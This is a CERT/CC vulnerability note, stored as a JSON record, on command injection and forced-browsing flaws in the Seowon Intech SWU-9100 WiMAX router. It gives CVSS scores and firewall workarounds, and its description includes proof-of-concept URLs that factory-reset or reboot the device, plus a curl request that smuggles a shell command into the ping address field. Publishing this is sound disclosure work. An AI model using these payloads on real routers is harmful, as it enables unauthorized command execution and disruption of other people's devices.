{"vuid":"VU#431726","idnumber":"431726","name":"Seowon Intech WiMAX SWU-9100 mobile router contains multiple vulnerabilities","keywords":["wimax","swu-9100","mobile","router","command injection","authentication","cwe-77","cwe-425"],"overview":"Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities.","clean_desc":"Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities. CVE-2013-7183 - CWE-425: Direct Request ('Forced Browsing')\nA remote unauthenticated attacker may factory reset or reboot the router by visiting a specific URL. http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply\nhttp://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply CVE-2013-7179 - CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')\nThe following is a proof-of-concept for the command injection vulnerability. curl -v --data \"select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping\" \"http://[IP_Router]/cgi-bin/diagnostic.cgi\" > /dev/null The CVSS score below is for CVE-2013-7179.","impact":"A remote unauthenticated attacker may be able to inject commands, reboot, or may perform a factory reset on the device.","resolution":"We are currently unaware of a practical solution to this problem. Please consider the following workaround.","workarounds":"Restrict Access Enable firewall rules so only trusted sources may access the device. Do not allow web administration from the WAN interface.","sysaffected":"","thanks":"Thanks to Josue Rojas for reporting this vulnerability.","author":"This document was written by Jared Allar.","public":["http://www.seowonintech.co.kr/en/product/detail.asp?num=117&big_kind=B04&middle_kind=B04_07","http://cwe.mitre.org/data/definitions/77.html","http://cwe.mitre.org/data/definitions/425.html"],"cveids":["CVE-2013-7179","CVE-2013-7183"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2013-12-17T19:52:07Z","publicdate":"2014-02-03T00:00:00Z","datefirstpublished":"2014-02-03T18:22:22Z","dateupdated":"2014-02-11T21:03:51Z","revision":22,"vrda_d1_directreport":"1","vrda_d1_population":"1","vrda_d1_impact":"1","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"A","cvss_accesscomplexity":"L","cvss_authentication":null,"cvss_confidentialityimpact":"C","cvss_integrityimpact":"C","cvss_availabilityimpact":"C","cvss_exploitablity":null,"cvss_remediationlevel":"W","cvss_reportconfidence":"UC","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"8.3","cvss_basevector":"AV:A/AC:L/Au:N/C:C/I:C/A:C","cvss_temporalscore":"6.4","cvss_environmentalscore":"1.60244750445696","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}